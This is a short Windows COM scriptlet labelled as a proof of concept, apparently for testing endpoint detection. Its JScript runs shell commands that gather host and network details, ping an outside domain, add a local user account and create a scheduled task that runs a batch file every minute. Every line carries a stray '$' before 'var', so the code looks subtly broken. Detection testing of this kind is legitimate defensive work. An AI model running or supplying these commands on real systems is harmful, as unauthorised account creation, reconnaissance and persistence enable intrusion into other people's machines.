<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
	<script language="JScript">
	<![CDATA[
$var r = new ActiveXObject("WScript.Shell").Run("cmd /c mkdir c:\\edrtest");
$var r = new ActiveXObject("WScript.Shell").Run("ipconfig /all");
$var r = new ActiveXObject("WScript.Shell").Run("arp -a");
$var r = new ActiveXObject("WScript.Shell").Run("ping misdepatrment.com -i 1");
$var r = new ActiveXObject("WScript.Shell").Run("wmic useraccount get /ALL");
$var r = new ActiveXObject("WScript.Shell").Run("net user /add sh123");
$var r = new ActiveXObject("WScript.Shell").Run("cmd /c systeminfo > c:\\edrtest\\systeminfo.txt");
$var r = new ActiveXObject("WScript.Shell").Run("cmd /c schtasks /create /tn edrtesttask1 /tr c:\\edrtest\\edrtest2-POV.bat /sc minute");
]]>
</script>
</registration>
</scriptlet>
